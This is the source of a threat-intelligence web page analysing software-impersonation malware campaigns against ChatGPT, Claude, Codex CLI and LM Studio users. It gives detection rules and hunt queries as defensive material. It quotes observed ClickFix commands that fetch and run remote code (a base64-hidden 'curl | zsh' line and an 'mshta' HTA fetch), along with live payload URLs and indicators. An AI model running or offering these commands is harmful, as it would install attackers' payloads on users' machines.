Files
imposterandClaude Fable 5 899ca50455 fix(theme): self-host arcade fonts, end heading color flash
theme-arcade.css opened with a cross-origin @import to Google Fonts,
which delayed the whole overlay sheet: H1s painted white from
style.css first, then snapped orange when the arcade layer applied.
On slow or mobile connections both states were visible, reading as
inconsistent heading colors across pages.

- Self-host Press Start 2P + VT323 woff2 (OFL) under assets/fonts/,
  replace the @import with local @font-face blocks
- Preload the two latin subsets in the default layout head
- Drop the dead 'color: var(--text)' H1 declarations on the three
  trend pages (clickgrab, edge-exploits, masq-infra) that the
  overlay's !important was silently overriding; arcade orange is
  the confirmed canonical H1 treatment sitewide

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01W87Fdr8vD1ZiR8jumj4Ud5
2026-07-13 18:28:11 -06:00

42 KiB
Raw Permalink Blame History

layout, title, description, permalink
layout title description permalink
default Software Impersonation Infrastructure: Trend Analysis Confirmed masquerading delivery infrastructure - favicon-pivot hunts, JS-gated EXE campaigns, ClickFix install modals, and developer-tool domain squats mapped through the Detection Chokepoint Framework. /trends/masq-infra/
<style> /* ── Page layout (matches ClickGrab / Edge Exploits) ───────────────────── */ .mi-page h1 { font-size: 1.6rem; font-weight: 700; margin-bottom: .25rem; } /* color: theme-arcade.css accent */ .mi-page h2 { font-size: 1.15rem; font-weight: 700; color: var(--text); margin: 2.5rem 0 .75rem; border-bottom: 1px solid transparent; border-image: linear-gradient(to right, var(--accent), var(--border) 35%, transparent) 1; padding-bottom: .4rem; } .mi-page h3 { font-size: 1rem; font-weight: 600; color: var(--text); margin: 1.5rem 0 .5rem; } .mi-page p, .mi-page li { color: var(--text-muted); font-size: .9rem; line-height: 1.7; } .mi-page a { color: var(--link); } .mi-meta { color: var(--text-muted); font-size: .8rem; margin-bottom: 1.75rem; } .mi-stats { display: flex; gap: 1rem; flex-wrap: wrap; margin: 1.25rem 0 2rem; } .mi-stat { flex: 1 1 140px; background: var(--bg-card); border: 1px solid var(--border); border-radius: 8px; padding: .85rem 1rem; box-shadow: 0 4px 16px rgba(0,0,0,0.25), inset 0 1px 0 rgba(255,255,255,0.04); } .mi-stat-val { font-size: 1.85rem; font-weight: 700; color: var(--text); font-family: ui-monospace, monospace; line-height: 1.2; } .mi-stat-lbl { font-size: .72rem; color: var(--text-muted); margin-top: .2rem; text-transform: uppercase; letter-spacing: .04em; } .mi-chain { display: flex; align-items: flex-start; gap: 0; flex-wrap: wrap; margin: 1.5rem 0 2rem; } .mi-chain-stage { flex: 1 1 90px; min-width: 80px; border: 1px solid var(--border); border-radius: 6px; padding: .6rem .5rem; text-align: center; background: var(--bg-card); position: relative; } .mi-chain-stage + .mi-chain-stage { margin-left: -1px; border-radius: 0; } .mi-chain-stage:first-child { border-radius: 6px 0 0 6px; } .mi-chain-stage:last-child { border-radius: 0 6px 6px 0; } .mi-chain-stage--blind { border-top: 3px solid var(--border); } .mi-chain-stage--t1 { border-top: 3px solid var(--high); box-shadow: inset 0 3px 10px -5px rgba(227,179,65,0.4); } .mi-chain-stage--t2 { border-top: 3px solid var(--accent); box-shadow: inset 0 3px 10px -5px rgba(240,136,62,0.4); } .mi-chain-stage--t3 { border-top: 3px solid var(--critical); box-shadow: inset 0 3px 10px -5px rgba(218,54,51,0.4); } .mi-chain-label { font-size: .72rem; font-weight: 600; color: var(--text); line-height: 1.3; display: block; } .mi-chain-sub { font-size: .62rem; color: var(--text-muted); margin-top: .25rem; display: block; } .mi-tier-badge { display: inline-block; font-size: .6rem; font-weight: 700; padding: .1rem .35rem; border-radius: 3px; margin-top: .35rem; letter-spacing: .03em; } .mi-tier-blind { background: var(--bg-input); color: var(--text-muted); } .mi-tier-t1 { background: rgba(227,179,65,.15); color: var(--high); } .mi-tier-t2 { background: rgba(240,136,62,.15); color: var(--accent); } .mi-tier-t3 { background: rgba(218,54,51,.15); color: var(--critical); } .mi-chain-arrow { align-self: center; flex: 0 0 auto; color: var(--border); font-size: 1.2rem; padding: 0 .1rem; margin-top: -2px; } .mi-callout { border-radius: 6px; padding: .85rem 1rem; margin: .75rem 0; font-size: .875rem; border-left: 3px solid; } .mi-callout--warn { background: rgba(227,179,65,.08); border-color: var(--high); color: var(--text); box-shadow: inset 3px 0 12px -5px rgba(227,179,65,0.35); } .mi-callout--alert { background: rgba(218,54,51,.08); border-color: var(--critical); color: var(--text); box-shadow: inset 3px 0 12px -5px rgba(218,54,51,0.35); } .mi-callout--info { background: rgba(56,139,253,.08); border-color: var(--low); color: var(--text); box-shadow: inset 3px 0 12px -5px rgba(56,139,253,0.35); } .mi-callout--tip { background: rgba(63,185,80,.08); border-color: var(--medium); color: var(--text); box-shadow: inset 3px 0 12px -5px rgba(63,185,80,0.35); } .mi-callout strong { color: var(--text); } .mi-table { width: 100%; border-collapse: collapse; font-size: .85rem; margin: .75rem 0 1.5rem; } .mi-table th { text-align: left; color: var(--text-muted); font-size: .72rem; text-transform: uppercase; letter-spacing: .04em; border-bottom: 1px solid var(--border); padding: .4rem .6rem; font-weight: 600; } .mi-table td { padding: .45rem .6rem; border-bottom: 1px solid var(--border); color: var(--text); font-size: .82rem; vertical-align: top; } .mi-table tr:hover td { background: rgba(255,255,255,0.02); } .mi-table .mono { font-family: ui-monospace, monospace; } .mi-table .muted { color: var(--text-muted); } .mi-methodology { background: var(--bg-card); border: 1px solid var(--border); border-left: 3px solid var(--accent); border-radius: 6px; padding: .75rem 1rem; margin: 1rem 0 1.5rem; font-size: .82rem; color: var(--text-muted); } .mi-class-stealer, .mi-class-c2, .mi-class-rmm, .mi-class-loader, .mi-class-unknown { font-size: .72rem; font-weight: 600; padding: .15rem .5rem; border-radius: 3px; font-family: monospace; text-transform: uppercase; letter-spacing: .04em; white-space: nowrap; } .mi-class-stealer { background: #ef444420; color: #ef4444; border: 1px solid #ef444440; } .mi-class-c2 { background: #f9731620; color: #f97316; border: 1px solid #f9731640; } .mi-class-rmm { background: #8b5cf620; color: #8b5cf6; border: 1px solid #8b5cf640; } .mi-class-loader { background: #06b6d420; color: #06b6d4; border: 1px solid #06b6d440; } .mi-class-unknown { background: #6b728020; color: #6b7280; border: 1px solid #6b728040; } .mi-campaign-card { background: var(--bg-card); border: 1px solid var(--border); border-radius: 8px; padding: 1rem 1.25rem; margin-bottom: 1rem; } .mi-campaign-title { font-weight: 700; color: var(--text); font-size: .95rem; margin-bottom: .35rem; } .mi-campaign-meta { display: flex; gap: .75rem; flex-wrap: wrap; font-size: .78rem; color: var(--text-muted); margin-bottom: .5rem; } .mi-tag { display: inline-block; font-size: .65rem; font-weight: 700; padding: .15rem .4rem; border-radius: 3px; letter-spacing: .03em; margin-right: .25rem; } .mi-tag-live { background: rgba(63,185,80,.15); color: #3fb950; } .mi-tag-survey { background: rgba(107,114,128,.15); color: var(--text-muted); } .mi-bar-wrap { display: flex; align-items: center; gap: .75rem; margin: .35rem 0; } .mi-bar { height: 18px; border-radius: 3px; min-width: 4px; background: var(--accent); opacity: .65; } .mi-bar-label { font-size: .78rem; color: var(--text-muted); min-width: 160px; } .mi-bar-count { font-size: .78rem; color: var(--text-muted); font-family: monospace; } .mi-chain-notice { background: var(--bg-card); border: 1px solid var(--border); border-left: 3px solid #6b7280; border-radius: 6px; padding: .75rem 1rem; font-size: .82rem; color: var(--text-muted); margin: .75rem 0; } .logic-block { background: var(--bg-code); border: 1px solid var(--border); border-radius: 6px; font-family: ui-monospace, monospace; font-size: .78rem; line-height: 1.6; } .det-rec { background: var(--bg-card); border: 1px solid var(--border); border-radius: 6px; margin: 1rem 0; overflow: hidden; } .det-rec-header { display: flex; align-items: flex-start; gap: 0.8rem; padding: 1rem 1.2rem; } .det-rec-tier { font-family: var(--font-mono); font-size: 0.65rem; font-weight: 700; letter-spacing: 0.08em; padding: 3px 10px; border-radius: 3px; white-space: nowrap; margin-top: 2px; flex-shrink: 0; } .det-rec-title { font-weight: 600; color: var(--text); font-size: 0.92rem; line-height: 1.4; } .det-rec-desc { color: var(--text-muted); font-size: 0.85rem; margin-top: 0.3rem; line-height: 1.5; } .det-rec details { padding: 0 1.2rem; margin: 0; } .det-rec details[open] { padding-bottom: 1rem; } .det-rec summary { font-family: var(--font-mono); font-size: 0.75rem; color: var(--text-muted); cursor: pointer; margin: 0; padding: 0.5rem 0; list-style: none; display: flex; align-items: center; gap: 0.4rem; } .det-rec summary::-webkit-details-marker { display: none; } .det-rec summary::before { content: "›"; color: var(--text-dim); transition: transform .15s; } details[open] > summary::before { transform: rotate(90deg); } details[open] > summary { margin-bottom: 0.4rem; } .tier-1 { background: rgba(218,54,51,0.15); color: var(--critical); } .tier-2 { background: rgba(240,136,62,0.15); color: var(--accent); } .tier-na { background: rgba(107,114,128,0.15); color: var(--text-muted); } .mi-payload-example { background: var(--bg-code); border: 1px solid var(--border); border-radius: 6px; padding: .75rem 1rem; margin: .5rem 0; overflow-x: auto; font-size: .78rem; } .trends-layout { display: flex; gap: 2rem; max-width: 1100px; margin: 0 auto; padding: 2rem 1.5rem 4rem; } .trends-sidebar { width: 160px; flex-shrink: 0; position: sticky; top: 5rem; align-self: flex-start; height: fit-content; padding: 1rem 0; } .trends-sidebar ul { list-style: none; padding: 0; margin: 0; } .trends-sidebar li { margin: 0; } .trends-sidebar a { display: block; font-family: var(--font-mono, ui-monospace, monospace); font-size: .73rem; color: var(--text-dim, #484f58); padding: .35rem .75rem; text-decoration: none; border-left: 2px solid transparent; border-radius: 0 3px 3px 0; transition: color .15s, border-color .15s, background .15s; } .trends-sidebar a:hover { color: var(--text-muted); text-decoration: none; background: rgba(255,255,255,0.025); } .trends-sidebar a.active { color: var(--text, #c9d1d9); font-weight: 500; border-left: 3px solid var(--accent, #f0883e); box-shadow: inset 3px 0 8px -4px rgba(240,136,62,0.4); background: rgba(240,136,62,0.07); } .trends-content { flex: 1; min-width: 0; } @media (max-width: 900px) { .trends-layout { flex-direction: column; padding: 2rem 1rem 4rem; } .trends-sidebar { position: fixed; bottom: 0; left: 0; right: 0; width: 100%; top: auto; align-self: auto; background: rgba(13,17,23,0.92); backdrop-filter: blur(8px); border-top: 1px solid var(--border); padding: .5rem 0; z-index: 100; } .trends-sidebar ul { display: flex; gap: 0; justify-content: space-around; width: 100%; overflow-x: auto; } .trends-sidebar a { border-left: none; border-bottom: 2px solid transparent; padding: .3rem .45rem; font-size: .58rem; text-align: center; white-space: nowrap; } .trends-sidebar a.active { border-bottom-color: var(--accent); border-left-color: transparent; } .trends-content { padding-bottom: 3.5rem; } } </style>

Software Impersonation Infrastructure

Hunt data: de-intel-pipeline  ·  Pipeline records: {{ site.data.masq_infra.meta.record_count | default: "-" }} {% if site.data.masq_infra_hunts %}  ·  {{ site.data.masq_infra_hunts.meta.hunt_count }} validated hunts  ·  {{ site.data.masq_infra_hunts.meta.date_range }} {% endif %} {% if site.data.masq_infra.meta.last_updated %}  ·  Aggregate updated: {{ site.data.masq_infra.meta.last_updated }} {% endif %}

Data: Validated de-intel-pipeline hunts (URLScan/sandbox-cited) + aggregate IOC pipeline (MalwareBazaar, ThreatFox, URLScan), payload-hash confirmed.
{% if site.data.masq_infra_hunts %}
{{ site.data.masq_infra_hunts.meta.hunt_count }}
Validated hunts
{{ site.data.masq_infra_hunts.meta.brands_targeted | size }}
Brands targeted
{{ site.data.masq_infra_hunts.meta.confirmed_delivery_count }}
Confirmed delivery
{% endif %} {% if site.data.masq_infra.meta.record_count %}
{{ site.data.masq_infra.meta.record_count }}
Pipeline records
{% endif %} {% if site.data.masq_infra.payload_summary %}
{{ site.data.masq_infra.payload_summary.top_families | size }}
Payload families
{% endif %} {% if site.data.masq_infra.campaigns %}
{{ site.data.masq_infra.campaigns | size }}
Pipeline campaigns
{% endif %}

Detection Chokepoint Framework

Every masquerading delivery campaign follows the same chain. The brand changes. The lure page changes. The payload host rotates. But the prerequisites don't: the adversary must register infrastructure, build a convincing lure, stage a payload, and get the victim to execute something. Perfect visual impersonation neutralizes user-facing trust signals - your detection budget belongs at execution and infrastructure layers.

Brand recon Favicon hash, title pivot T1595 RECON
Domain registration Squat, typosquat, co.com TLD T1583.001 DOMAINS
Lure page build Clone + stolen favicon/logo T1036.005 MASQ
Payload staging CDN, BunnyCDN, HTA host T1608.001 STAGE
Delivery gate JS click, UA filter, modal T1566.002 PHISH
User execution EXE, mshta, curl|zsh T1204.002 EXEC
Stages 1–3 are largely blind to endpoint detection. Favicon pivots and domain registration happen off-network. The lure page looks identical to the real product. Detection compounds at payload staging (network/DNS), delivery gate (proxy/IOK), and user execution (EDR/Sigma). A detection that fires only on the domain name breaks when the operator rotates hosting; one that fires on signed-binary-from-Downloads survives the rotation.

{% if site.data.masq_infra_hunts.infra_patterns.size > 0 %}

Infrastructure Patterns Across Hunts

{% assign max_pat = site.data.masq_infra_hunts.infra_patterns.first.hunt_count | default: 1 %} {% for pat in site.data.masq_infra_hunts.infra_patterns %} {% assign bar_w = pat.hunt_count | times: 200 | divided_by: max_pat %}
{{ pat.pattern }}
{{ pat.hunt_count }}/{{ site.data.masq_infra_hunts.meta.hunt_count }}
{% endfor %} {% endif %}

Active Campaigns (Hunt Intelligence)

Validated hunts from the de-intel-pipeline. Each object passed schema, citation, and source-diversity validation before promotion to hunts/.

{% if site.data.masq_infra_hunts.campaigns.size > 0 %} {% for camp in site.data.masq_infra_hunts.campaigns %}

{{ camp.brand }}
{{ camp.date_start }} → {{ camp.date_end }} {{ camp.ioc_count }} IOCs {{ camp.ttp_count }} TTPs {% if camp.confirmed_delivery %} CONFIRMED DELIVERY {% else %} SURVEY / SQUAT {% endif %}

{{ camp.threat_name }} - {% for method in camp.delivery_methods %}{{ method }}{% unless forloop.last %}, {% endunless %}{% endfor %}

{% if camp.domains.size > 0 %}

{% for d in camp.domains limit:4 %}{{ d }}{% unless forloop.last %} · {% endunless %}{% endfor %}

{% endif %}
{% endfor %}

{% if site.data.masq_infra_hunts.brand_matrix.size > 0 %}

Brand Impersonation Matrix

{% for row in site.data.masq_infra_hunts.brand_matrix %} {% endfor %}
BrandCampaignsDelivery methodsConfirmed delivery
{{ row.brand }} {{ row.campaign_count }} {% for m in row.delivery_methods %}{{ m }}{% unless forloop.last %}; {% endunless %}{% endfor %} {% if row.confirmed_delivery %}Yes{% else %}No{% endif %}
{% endif %} {% else %}
No hunt data loaded. Run python scripts/transform_intel_hunts.py to generate _data/masq_infra_hunts.yml.
{% endif %}

ChatGPT Impersonation - MROScanner OU Installer

A fake "ChatGPT for Windows" download page (chatgpt-windows.com) on Oracle Cloud serves a 2.3 MB Inno Setup installer signed by Estonian shell company MROScanner OU. Download is JS-gated - no static link in HTML - with Windows-only UA fingerprinting and per-visitor affiliate tracking via a PHP backend. Payload staged on BunnyCDN.

POST /init/tracking.php
→ returns per-visitor URL: https://app-cg.b-cdn.net/ChatGPT_Installer.exe?hash=<token>

ChatGPT_Installer.exe
SHA-256: 17dc646d645252196a19e87752fa21dbe7b626cd71a9dacddebd9a2ed8f1e16e
Signer: MROScanner OU (SSL.com, thumbprint E3B6CF11...)
The cert is the stickiest signal. MROScanner OU + thumbprint E3B6CF11... appears on every binary this operator signs until revocation (valid until April 2027). The domain rotates. The CDN bucket name rotates. The cert thumbprint does not. Monitor VT/Hunt.io for new hits on this signer.
JS-only download gate defeats static scanners. URLScan sees a blank download page. The payload URL surfaces only after JavaScript executes a POST to /init/tracking.php. Non-Windows user-agents get "Unsupported System" - further reducing scanner noise and narrowing the victim pool to paid malvertising traffic (UTM params: fbclid, bid, tid).
SignalDurabilityNotes
chatgpt-windows.comMedium3-year squatter history; repurposed May 2026
app-cg.b-cdn.netLowCDN bucket - hash the binary when sandbox completes
MROScanner OU certHighPivot on thumbprint across VT/Hunt.io
/init/tracking.phpMediumSame PHP structure links sibling campaigns

Claude Code - ClickFix Install Modal

Three fake "Download Claude" pages clone claude.com and present a fake install modal. Mac victims run a base64-concealed curl | zsh command; Windows victims run mshta https://download.version-516.com/claude. The kit predates Claude targeting - /other path was active 12 days before /claude.

# Mac - social cover echo, then malicious curl
echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo '<base64>' | openssl base64 -d -A) | zsh

# Windows - HTA via signed LOLBin
mshta https://download.version-516.com/claude
Different delivery model - no file on disk for the primary vector. Paste-to-run bypasses SmartScreen entirely. The victim opens a terminal, reads a command that looks like official Anthropic install docs, and executes it. Cross-platform delivery (Mac + Windows) from the same kit with per-site payload domain rotation (xprssit.com vs ewabeniak.com).
Real Anthropic analytics loaded on every visit. Clone pages load Segment, Amplitude, and claude-custom-tracking.js from www.anthropic.com. Victim traffic blends into legitimate claude.com analytics noise - a subtle signal worth monitoring if you correlate page views with actual installs.
DomainRole
uneifoifow-3ndfskq.pages.devCloudflare Pages lure; Mac payload via xprssit.com
too.clawddddd.comTyposquat lure; Mac payload via ewabeniak.com
download.version-516.comShared Windows HTA host (/claude, /other)
xprssit.com / ewabeniak.comPer-site Mac shell script delivery (/curl/<hash>)

OpenAI Codex CLI - Domain Squatting

Multiple domains registered within weeks of the Codex CLI public launch (April 2026) squat the exact product name. No confirmed binary delivery - credential harvest and SEO poisoning targeting developers who search for install instructions instead of using npm install -g @openai/codex.

Developer tool distribution shifts the attack surface. CLI tools distributed via npm/GitHub have no downloadable installer page - favicon hash pivots don't apply when Cloudflare bot-protects openai.com. Adversaries pivot to title-based and domain-pattern queries. Watch for ClickFix paste-to-run pages appearing on these domains - the Claude Code hunt found the same pattern on Cloudflare Pages sites with similar domain age profiles.
DomainStatusPattern
codex-cli.orgPhishing-tagged; dormant empty HTMLSquats npm package name
codexhub.clickVietnamese Codex CLI page + /loginCredential harvest suspected
codexcli.homesSSL cipher mismatch - conditional servingGeo/IP gated content
codexcli.gr.com404 at scan timeDormant squat infrastructure

LM Studio - API Endpoint Impersonation

lmstudio.co.com redirects to www.api.lmstudio.co.com, impersonating the LM Studio local API server (normally localhost:1234). No installer delivery - threat is prompt exfiltration or API key theft via a misconfigured client endpoint string.

The supply chain of developer tooling config. A domain at api.lmstudio.co.com is indistinguishable from a legitimate remote LM Studio endpoint in a config string. Watch for this pattern on Ollama (localhost:11434), Jan.ai, AnythingLLM. DNS was pulled by May 11, 2026 after community phishing reports.

Notion Coverage Survey

Favicon pivot for Notion returned 5,692 non-Notion hits - structurally too noisy because Notion is used as a CMS backend by thousands of legitimate sites. No active Windows/Mac delivery campaign detected in the last 90 days. Only finding: notiondownload.com (Android APK squatter, Hostinger).

Not every brand is pivot-able. Heavily embedded brands (Notion, Google Docs) copy favicons verbatim across legitimate third-party sites. File-type narrowing (filename:*.exe) requires a URLScan API key. Title pivots and domain-pattern queries are the fallback when favicon hash pivots produce unusable noise.

Cross-Campaign Operator Comparison

Two distinct delivery philosophies emerged from the May 2026 hunt window - traditional EXE distribution vs. paste-to-run developer targeting.

MROScanner OU (ChatGPT)ClickFix Install Modal (Claude)
DeliveryEXE download (JS-gated)Paste-to-run command
File on diskYes - Inno Setup installerNo file for primary vector
Code signingShell-company AuthenticodeNot applicable
OS targetingWindows only (UA filter)Mac + Windows (separate commands)
ObfuscationBunnyCDN + per-visitor hashBase64 URL in JS + domain rotation
InfrastructureOracle Cloud dedicated VMCloudflare Pages (ephemeral)
Traffic modelPaid malvertising (UTM tracking)Real brand analytics loaded
Kit reuseUnknownConfirmed multi-brand (/other path)
SophisticationMediumMedium-high
Two operators, same target demographic. Both campaigns impersonate AI developer tools released in 2025–2026. The EXE operator buys code signing certs and runs paid traffic. The ClickFix operator skips file download entirely and targets terminal-comfortable users. Your detection stack needs both paths: signed-binary-from-Downloads and unusual-parent → mshta/curl-from-terminal.

{% if site.data.masq_infra_hunts.ttp_summary.size > 0 %}

MITRE Technique Frequency (Hunts)

{% for ttp in site.data.masq_infra_hunts.ttp_summary %} {% endfor %}
TechniqueLabelHunts
{{ ttp.mitre_id }} {{ ttp.label }} {{ ttp.count }}
{% endif %}

Aggregate Pipeline Data

IOC-first pipeline records from confirmed payload reports and infrastructure hunts. Delivery chains shown only when URLScan captured the redirect sequence.

{% if site.data.masq_infra.payload_summary %} {% assign ps = site.data.masq_infra.payload_summary %}

Payload Class Breakdown

{% assign max_class = 1 %} {% assign cb = ps.class_breakdown %} {% for item in cb %} {% if item[1] > max_class %} {% assign max_class = item[1] %} {% endif %} {% endfor %} {% assign classes = "stealer,c2,rmm,loader,unknown" | split: "," %} {% for cls in classes %} {% assign cls_count = cb[cls] | default: 0 %} {% assign bar_pct = cls_count | times: 100 | divided_by: max_class %}
{{ cls }}
{{ cls_count }}
{% endfor %} {% endif %}

{% assign records = site.data.masq_infra.records %} {% if records.size > 0 %}

Confirmed Delivery Domains (sample)

{% assign sorted = records | sort: "last_seen" | reverse %} {% for rec in sorted limit:15 %} {% endfor %}
DomainIPClassFirst seen
{{ rec.domain }} {{ rec.ip | default: "-" }} {{ rec.payload_class }} {{ rec.first_seen | date: "%Y-%m-%d" }}
{% else %}
Pipeline records sparse or schema misaligned. Run collection pipeline or Streamlit review app to refresh _data/masq_infra.json.
{% endif %}

{% assign fav_clusters = site.data.masq_infra.infrastructure_summary.favicon_clusters %} {% if fav_clusters.size > 0 %}

Favicon Clusters

{% for fc in fav_clusters %} {% endfor %}
HashDomainsSample
{{ fc.favicon_hash }} {{ fc.count }} {{ fc.sample_domain }}
{% endif %}

{% if site.data.masq_infra_history %}

Weekly Volume

{% endif %}

Detection Recommendations

Each recommendation maps to the ATT&CK technique it detects. Execution-layer rules survive brand rotation; domain blocklists do not.

T1036.005
PE OriginalFilename mismatch
Alert when a process OriginalFilename from the PE version resource does not match its running filename. Adversaries rename malicious binaries - they rarely recompile with matching resources.
Example detection logic
title: Masqueraded Installer OriginalFilename Mismatch
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\ChatGPT_Installer.exe'
      - '\ZoomInstaller.exe'
      - '\DiscordSetup.exe'
    CurrentDirectory|contains:
      - '\Downloads\'
      - '\AppData\Local\Temp\'
  filter_legit:
    OriginalFileName|contains:
      - 'ChatGPT'
      - 'Zoom'
      - 'Discord'
  condition: selection and not filter_legit
level: high
T1553.002
Shell-company signed binary from user download path
A signed binary executing from Downloads after a browser spawn is more anomalous than unsigned execution in managed environments. Legitimate signed software deploys via IT tooling, not user download directories. MROScanner OU is a known shell-company signer pattern.
Observed signers (1)
ChatGPT_Installer.exe
Signer: MROScanner OU (Tallinn, EE)
CA: SSL.com Code Signing Intermediate CA RSA R1
Thumbprint: E3B6CF111525417CE68C1CBE99E257DBAC54D071
Valid: 2026-04-22 to 2027-04-21
Example detection logic
title: Signed Installer Executed From Downloads After Browser Spawn
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\chrome.exe'
      - '\msedge.exe'
      - '\firefox.exe'
  selection_installer:
    Image|endswith:
      - '\setup.exe'
      - '\installer.exe'
      - '\install.exe'
    CurrentDirectory|contains: '\Downloads\'
    Signed: 'true'
  filter_known_vendors:
    SignatureStatus: 'Valid'
    Signature|contains:
      - 'Microsoft'
      - 'Google'
      - 'Zoom'
  condition: selection_parent and selection_installer and not filter_known_vendors
level: high
T1218.005
mshta fetching HTA from non-enterprise URL
mshta.exe spawned from cmd.exe, Run dialog, or terminal context fetching an HTA from an external domain. Covers Claude Code ClickFix Windows delivery via download.version-516.com/claude.
Observed payloads (1)
mshta https://download.version-516.com/claude
Example detection logic
title: Mshta Executing Remote HTA From Unusual Parent
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\mshta.exe'
    CommandLine|contains:
      - 'http://'
      - 'https://'
  selection_parent:
    ParentImage|endswith:
      - '\cmd.exe'
      - '\explorer.exe'
      - '\WindowsTerminal.exe'
  filter_enterprise:
    CommandLine|contains:
      - '.microsoft.com'
      - '.windows.com'
  condition: selection and selection_parent and not filter_enterprise
level: high
T1059.004
curl piped to shell from terminal (Mac developer targeting)
Detect curl -s ... | zsh or curl ... | bash where the URL domain is not a known package manager or vendor CDN. Claude Code install modal uses base64-concealed curl URLs on attacker-controlled domains.
Observed payloads (2)
# Social cover echo + malicious curl (Mac)
echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo '<base64>' | openssl base64 -d -A) | zsh

Decoded payload URL (uneifoifow variant)

https://xprssit.com/curl/6df71b43667a2d1d9de3e88cba7e16fb11b4ddf67af64b853b903b3fa8ead500

Example detection logic
title: Curl Piped to Shell From Non-Vendor Domain
logsource:
  category: process_creation
  product: macos
detection:
  selection:
    Image|endswith:
      - '/curl'
      - '/zsh'
      - '/bash'
    CommandLine|contains|all:
      - 'curl'
      - '|'
  filter_vendors:
    CommandLine|contains:
      - 'anthropic.com'
      - 'homebrew.sh'
      - 'github.com'
  condition: selection and not filter_vendors
level: high
INFRA
Favicon hash pivoting for infrastructure clustering
From one confirmed fake domain: fetch favicon, compute Murmur3 hash, query Shodan/URLScan. Campaigns reusing stolen favicons across dozens of domains surface immediately. ChatGPT hunt: 158 hits on OpenAI favicon pivot; Claude: 1,003 hits.
Example hunt queries
# URLScan favicon pivot (ChatGPT)
hash:9747c13cd87b36ebf2ab567b9d0bc2ff49b5a4f46f4f51e4d053024f579fb9a0 AND NOT page.domain:openai.com

URLScan favicon pivot (Claude)

hash:816a55828befeb50fe8a9556cb92d80194efefbd3f4e04ccf694992dd8e085e3 AND NOT page.domain:claude.ai

Shodan

http.favicon.hash:<mmh3_int>

INFRA
Affiliate tracking backend fingerprint
The /init/tracking.php + /init/pixel.php endpoint pattern with UTM parameters (fbclid, bid, tid) indicates a paid traffic malvertising campaign. If this PHP structure reappears on another fake download page, it connects campaigns to the same kit or operator.
Example detection logic
# Proxy / DNS - hunt for sibling sites
cs-uri-stem: '/init/tracking.php'
cs-method: 'POST'
cs-uri-query|contains:
  - 'utm_source='
  - 'fbclid='

URLScan pivot

page.url:"/init/tracking.php" AND filename:*.exe

{% if site.data.masq_infra_history %}

<script> window.MASQ_HISTORY = {{ site.data.masq_infra_history | jsonify }}; </script> <script src="{{ '/assets/js/masq-infra-history.js' | relative_url }}"></script>

{% endif %}

<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.10.0/highlight.min.js"></script> <script> (function() { var navLinks = document.querySelectorAll('.trends-sidebar a'); if (!navLinks.length) return; var sections = Array.from(navLinks).map(function(l) { return document.querySelector(l.getAttribute('href')); }).filter(Boolean); var observer = new IntersectionObserver(function(entries) { entries.forEach(function(entry) { if (entry.isIntersecting) { navLinks.forEach(function(link) { link.classList.toggle('active', link.getAttribute('href') === '#' + entry.target.id); }); } }); }, { rootMargin: '-20% 0px -70% 0px' }); sections.forEach(function(s) { observer.observe(s); }); })();

if (typeof hljs !== 'undefined') { document.querySelectorAll('.mi-payload-example code, .logic-block code').forEach(function(el) { var text = el.textContent || el.innerText; var lang = /logsource:|condition:/.test(text) ? 'yaml' : 'bash'; el.className = 'language-' + lang; hljs.highlightElement(el); }); } </script>